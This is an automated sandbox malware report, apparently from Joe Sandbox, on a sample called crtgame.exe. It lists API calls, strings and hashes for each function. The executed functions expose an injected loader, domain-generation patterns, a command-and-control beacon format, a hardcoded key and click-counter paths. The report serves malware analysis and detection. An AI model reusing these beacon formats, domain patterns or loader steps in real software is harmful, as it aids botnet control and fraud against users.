Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
Instruction Fuzzy Hash: C63192B2A00218AAEF20EA60DD49FDA376DEF85304F1005BBF545B61C1D6B8AE518A19

Function 00404770 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 0040478B
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 0040479F
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 004047CB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403006), ref: 00404803
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403006), ref: 00404825
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403006), ref: 0040483E
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403006), ref: 00404851
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040488F

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
Instruction ID: b3dd828dc6d9f78d8a5ea985437d6bc406cb02d63f326d11a028c5d351c81a87
Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
Instruction Fuzzy Hash: 2E31D0FB5042A56ED7207BB59C8483B769CE6C6358B158D3FF642F3380E6398C4186A9

Function 00401FFB Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,0000000A,00000000), ref: 00402011
GetLastError.KERNEL32 ref: 0040201D
SizeofResource.KERNEL32(00000000), ref: 0040202A
LoadResource.KERNEL32(00000000), ref: 00402044
LockResource.KERNEL32(00000000), ref: 0040204B
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402056
GetTickCount.KERNEL32 ref: 00402092
GlobalAlloc.KERNEL32(00000040,?), ref: 004020F8

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
String ID:
API String ID: 564119183-0
Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
Instruction ID: 5bb6e3aa1d8004c7212ec098650266c2412a7dfd0dc2f216cc67e198d7e8a746
Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
Instruction Fuzzy Hash: 66313B71A003416FDF118BB99E48AAF7F78EF49344B10803AFA46F72C1D6748840C7A8

Function 004021C6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139librarysleepmemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,74DF30D0), ref: 004021E3
GetLastError.KERNEL32 ref: 00402298
LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004022A5
GetProcAddress.KERNEL32(?,?), ref: 004022E0
Sleep.KERNEL32(000003E8), ref: 00402336

Strings

(, xrefs: 0040225B

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
String ID: (
API String ID: 2871813557-3887548279
Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
Instruction ID: cf3737800172ba696e67f432db29e15671dddcf18138f746b38aebc0affdf460
Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
Instruction Fuzzy Hash: AD518371A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B4EA51CB94

Function 00403B68 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403300), ref: 00403B89
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403300), ref: 00403BAD
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403300), ref: 00403BC7
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403300), ref: 00403C88
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403300), ref: 00403C9F

Strings

@q@, xrefs: 00403B75, 00403BD1, 00403BDA, 00403BE3, 00403C8E
@q@, xrefs: 00403BE8, 00403BF1, 00403BFA, 00403C02

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID: @q@$@q@
API String ID: 714016831-1591251108
Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
Instruction ID: bb2f25b3c446edc19c5578eb3fd2b922e436acdaef88fb0018a24f570b544f83
Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
Instruction Fuzzy Hash: BB3105719447019FE3308F25DD45B26BBE8E748756F10423AE555FB3D0D778A9008B4D

Function 00405DCE Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E0D
GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E27
GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E5B
MultiByteToWideChar.KERNEL32(00404EF3,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EF3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E93
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EE9
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405EFB

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 842452aa044ae0ef97ac5ad7deab647cbfc0197c5a7373b2729050aa298a8793
Instruction ID: 1ddadf124a6ca1b2ca8ea797e0c37c36c04b0ffb7962988f26068f32c671ff11
Opcode Fuzzy Hash: 842452aa044ae0ef97ac5ad7deab647cbfc0197c5a7373b2729050aa298a8793
Instruction Fuzzy Hash: EC416E7250060AAFCF119F94DD85EAF7B78EB04750F14443AFA12B2290D33989609F99

Function 00403172 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00403191
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031C6
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403226

Strings

__MSVCRT_HEAP_SELECT, xrefs: 004031C1
__GLOBAL_HEAP_SELECTED, xrefs: 00403200

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
Instruction ID: 352fa3c33e130876c133b2754c5b4d876673d384c6c3ddc615f50f25897675de
Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
Instruction Fuzzy Hash: 013113719012886EEB319B745C56ADA3F6C9B07709F2804FFE045F92C2D67D8F898B19

Function 004048A2 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 004048FB
GetFileType.KERNEL32(00000800), ref: 004049A1
GetStdHandle.KERNEL32(-000000F6), ref: 004049FA
GetFileType.KERNEL32(00000000), ref: 00404A08
SetHandleCount.KERNEL32 ref: 00404A3F

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
Instruction ID: 7ab3d1d28a75e02bc3976350f442f418a05f15b5b9e5150e71043de01d347dcb
Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
Instruction Fuzzy Hash: 195126F16043208BD7208B38CD447677BA0AB81324F1A473AE7E6FB2E0D73C8855871A

Function 00403CAC Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403DAC,@q@,74DEDFF0,?,00000000,?,?,00403E5E,00000010,00403113,?,?), ref: 00403CBB
HeapFree.KERNEL32(00000000,?,?,00403E5E,00000010,00403113,?,?), ref: 00403CF1

Strings

@q@, xrefs: 00403CAC, 00403CD1
@q@, xrefs: 00403CC1, 00403CCC

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Free$HeapVirtual
String ID: @q@$@q@
API String ID: 3783212868-1591251108
Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
Instruction ID: c782c7eae1b72a8f5ff76f91d06b99a82836aed0f6ab4a515ec71bd81a8f307c
Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
Instruction Fuzzy Hash: CCF03431A04210DFD7249F28EE09B427BF4FB08710B014A2AF5A6AB3E1C731AC40CF48

Function 00405716 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 0040572A

Strings

, xrefs: 00405773
, xrefs: 0040574F

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
Instruction ID: 1dc73218bf82df75e1ac1fd630f929f888ccf1ffeade1f599fe503148fb6ac43
Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
Instruction Fuzzy Hash: 574127320046686EEB15A714DD59BFB3FA9DB06704F1400F6D94AFB1D2C27949288FAF

Function 004039BC Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 004039E4
HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A18
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A32
HeapFree.KERNEL32(00000000,?,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A49

Memory Dump Source

Source File: 00000004.00000002.1722598160.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1722598160.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_crtgame.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
Instruction ID: 1692a555d73bf0e7419dcacebfa4393f5b3048e317361d03b61efb90fa74d0f8
Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
Instruction Fuzzy Hash: 6F116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E75B0C7729961CF09

Analysis Process: crtgame.exePID: 5824, Parent PID: 2200COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.6%
Total number of Nodes:	751
Total number of Limit Nodes:	34

Executed Functions

Function 02C25F2A Relevance: 189.1, APIs: 60, Strings: 47, Instructions: 1836memorynetworksleepCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(02C573D8), ref: 02C25F59
GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C25F70
GetProcAddress.KERNEL32(00000000), ref: 02C25F79
GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C25F88
GetProcAddress.KERNEL32(00000000), ref: 02C25F8B

Part of subcall function 02C2F1FA: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C2F248
Part of subcall function 02C2F1FA: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C2F269
Part of subcall function 02C2F1FA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C2F27D
Part of subcall function 02C2F1FA: CloseHandle.KERNEL32(00000000), ref: 02C2F286

GetTickCount.KERNEL32 ref: 02C25FCC
GetVersionExA.KERNEL32(02C57030), ref: 02C25FF9
_malloc.LIBCMT ref: 02C26023
_malloc.LIBCMT ref: 02C26033
_malloc.LIBCMT ref: 02C26041
_malloc.LIBCMT ref: 02C2604C
_malloc.LIBCMT ref: 02C26057
_malloc.LIBCMT ref: 02C26062
_malloc.LIBCMT ref: 02C2606D
_malloc.LIBCMT ref: 02C2607C
GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C26093
RtlAllocateHeap.NTDLL(00000000), ref: 02C2609C
GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C260AB
RtlAllocateHeap.NTDLL(00000000), ref: 02C260AE
GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C260B9
RtlAllocateHeap.NTDLL(00000000), ref: 02C260BC
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C260F6
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26103
_malloc.LIBCMT ref: 02C26127

Part of subcall function 02C329CC: __FF_MSGBANNER.LIBCMT ref: 02C329E3
Part of subcall function 02C329CC: __NMSG_WRITE.LIBCMT ref: 02C329EA
Part of subcall function 02C329CC: RtlAllocateHeap.NTDLL(00990000,00000000,00000001), ref: 02C32A0F

_malloc.LIBCMT ref: 02C26135
_malloc.LIBCMT ref: 02C2613C
_malloc.LIBCMT ref: 02C26160
QueryPerformanceCounter.KERNEL32(00000200), ref: 02C26170
Sleep.KERNELBASE ref: 02C2617E
_malloc.LIBCMT ref: 02C2618A
_malloc.LIBCMT ref: 02C26197
Sleep.KERNELBASE(00001388), ref: 02C261D8
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C261E3
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C261F4
GetTickCount.KERNEL32 ref: 02C262FB
wsprintfA.USER32 ref: 02C26C51
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C26D53
InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C26D7B
InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C26D93
InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C26DAB
InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C26DD4
InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C26DF3
InternetCloseHandle.WININET(00000000), ref: 02C26E0D
InternetCloseHandle.WININET(00000000), ref: 02C26E18
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26E88
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26E99
_malloc.LIBCMT ref: 02C26F20
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C26F32
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C26F3E
_malloc.LIBCMT ref: 02C27012
_strtok.LIBCMT ref: 02C27043
_swscanf.LIBCMT ref: 02C2705A
_strtok.LIBCMT ref: 02C27071
Sleep.KERNEL32(000007D0), ref: 02C27178
RtlEnterCriticalSection.NTDLL(02C573D8), ref: 02C271F9
RtlLeaveCriticalSection.NTDLL(02C573D8), ref: 02C2720B
_sprintf.LIBCMT ref: 02C272A0
RtlEnterCriticalSection.NTDLL(00000020), ref: 02C27364
RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C27398

Part of subcall function 02C25D33: _malloc.LIBCMT ref: 02C25D41

_malloc.LIBCMT ref: 02C27599

Strings

g%c%c%c%c%c%c.com, xrefs: 02C268F3
k%c%c%c%c%c%c.ua, xrefs: 02C26A3D
updurls, xrefs: 02C26EE3, 02C2757E
t%c%c%c%c%c%c.info, xrefs: 02C265C5
, xrefs: 02C27512
n%c%c%c%c%c%c.net, xrefs: 02C267D4
u%c%c%c%c%c%c.ua, xrefs: 02C2666B
e%c%c%c%c%c%c.ua, xrefs: 02C26BFA
q%c%c%c%c%c%c.ru, xrefs: 02C266BE
y%c%c%c%c%c%c.info, xrefs: 02C2640B
o%c%c%c%c%c%c.info, xrefs: 02C26781
z%c%c%c%c%c%c.ua, xrefs: 02C264B1
d%c%c%c%c%c%c.info, xrefs: 02C26B54
block, xrefs: 02C2702B
i4hiea56#7b&dfw3, xrefs: 02C262D3, 02C26E35
connect, xrefs: 02C26E9F, 02C26EFD
j%c%c%c%c%c%c.info, xrefs: 02C26944
<htm, xrefs: 02C26E26
Host: %s, xrefs: 02C26CBA
x%c%c%c%c%c%c.net, xrefs: 02C2645E
r%c%c%c%c%c%c.com, xrefs: 02C26574
strcat, xrefs: 02C25F7B
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02C26209
idle, xrefs: 02C26EC1, 02C27224
client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02C26144
v%c%c%c%c%c%c.ru, xrefs: 02C26504
f%c%c%c%c%c%c.ru, xrefs: 02C26A90
auth_swith, xrefs: 02C26FBB
sprintf, xrefs: 02C25F6A
w%c%c%c%c%c%c.com, xrefs: 02C263BA
s%c%c%c%c%c%c.net, xrefs: 02C26618
l%c%c%c%c%c%c.ru, xrefs: 02C2687A
h%c%c%c%c%c%c.net, xrefs: 02C269EA
c%c%c%c%c%c%c.net, xrefs: 02C26BA7
b%c%c%c%c%c%c.com, xrefs: 02C26B03
auth_ip, xrefs: 02C26FE7, 02C27270
i%c%c%c%c%c%c.info, xrefs: 02C26997
ntdll.dll, xrefs: 02C25F65, 02C25F6F, 02C25F80
a%c%c%c%c%c%c.ru, xrefs: 02C26C4B
updips, xrefs: 02C26ED2, 02C2724F
http://, xrefs: 02C26CCD
p%c%c%c%c%c%c.ua, xrefs: 02C26827
%d;, xrefs: 02C2729A
disconnect, xrefs: 02C26EB0, 02C271CC
/click/?counter=, xrefs: 02C26D15
urls, xrefs: 02C275B1
m%c%c%c%c%c%c.com, xrefs: 02C26730

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: _malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
API String ID: 3871695393-1381308451
Opcode ID: ee7439defd963c184bbea21a84ebefd5f48b494ea15a4454c3b5ef931aadc38c
Instruction ID: 2c360e329bf47e2816b776052521c104f4899a28cb0984014c748f58d634a8a2
Opcode Fuzzy Hash: ee7439defd963c184bbea21a84ebefd5f48b494ea15a4454c3b5ef931aadc38c
Instruction Fuzzy Hash: 06D20CB36187A05ED315AB1C9C81B7FFBDC6F89704F59092DF5D5C6142CA28C609CBA2

Function 02C25EB7 Relevance: 75.6, APIs: 36, Strings: 7, Instructions: 383memorylibraryloaderCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(02C573D8), ref: 02C25F59
GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C25F70
GetProcAddress.KERNEL32(00000000), ref: 02C25F79
GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C25F88
GetProcAddress.KERNEL32(00000000), ref: 02C25F8B
GetTickCount.KERNEL32 ref: 02C25FCC
GetVersionExA.KERNEL32(02C57030), ref: 02C25FF9
_malloc.LIBCMT ref: 02C26023
_malloc.LIBCMT ref: 02C26033
_malloc.LIBCMT ref: 02C26041
_malloc.LIBCMT ref: 02C2604C
_malloc.LIBCMT ref: 02C26057
_malloc.LIBCMT ref: 02C26062
_malloc.LIBCMT ref: 02C2606D
_malloc.LIBCMT ref: 02C2607C
GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C26093
RtlAllocateHeap.NTDLL(00000000), ref: 02C2609C

Strings

sprintf, xrefs: 02C25F6A
w%c%c%c%c%c%c.com, xrefs: 02C263BA
strcat, xrefs: 02C25F7B
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02C26209
client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02C26144
i4hiea56#7b&dfw3, xrefs: 02C262D3
ntdll.dll, xrefs: 02C25F65, 02C25F6F, 02C25F80

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: _malloc$AddressHandleHeapModuleProc$AllocateCountCriticalInitializeProcessSectionTickVersion
String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
API String ID: 3594589716-2290804818
Opcode ID: eaf2b1e52fcc612875be831a798f630697c8dbc3e010160565f40b8406575a6c
Instruction ID: df88a764ddef4432c61551c3c48721b72bda065afdd7279d43e764c09a48ae5c
Opcode Fuzzy Hash: eaf2b1e52fcc612875be831a798f630697c8dbc3e010160565f40b8406575a6c
Instruction Fuzzy Hash: 95D12772D443609FD721AB349C44B6BBFE8AF89704F140D2DF984A7281DB749948CBA2

Function 02C2F3B3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C2F3C9
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C2F3E2
GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C2F407
FreeLibrary.KERNEL32(00000000), ref: 02C2F490

Strings

GetAdaptersInfo, xrefs: 02C2F3DC
iphlpapi.dll, xrefs: 02C2F3BD

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll
API String ID: 514930453-3114217049
Opcode ID: 58640a0b3136c6b08164889623e75c04f6f2b7d22794da7079e344f0ee65dfa5
Instruction ID: c0283bcc1896b9ad931ca7354b4556dc93e50b63e604dea88003a8080983bbf2
Opcode Fuzzy Hash: 58640a0b3136c6b08164889623e75c04f6f2b7d22794da7079e344f0ee65dfa5
Instruction Fuzzy Hash: 5621A275A0422DABDB10DFA898847EEBBF8BF48314F0441BDD545E7601DFB09A49CBA0

Function 02C22B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C22BE4
WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C22C07

Part of subcall function 02C29EA8: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EB6

WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C22CD3
select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C22CE7

Strings

3', xrefs: 02C22C85

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Recvselect
String ID: 3'
API String ID: 886190287-280543908
Opcode ID: 11a1036687d8b95e4e0923e686fea12013bb420f4d27589a7c3e9b0e5ee8671e
Instruction ID: 58a3073527039b8fdb8422fb844bc2cf7434689e8aed7f0925dff2f29b937eb4
Opcode Fuzzy Hash: 11a1036687d8b95e4e0923e686fea12013bb420f4d27589a7c3e9b0e5ee8671e
Instruction Fuzzy Hash: BC415AB29143158FD721AF74C90476BBBE9EF84354F100D5EE89987280EFB4D948CBA2

Function 02C2F2AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

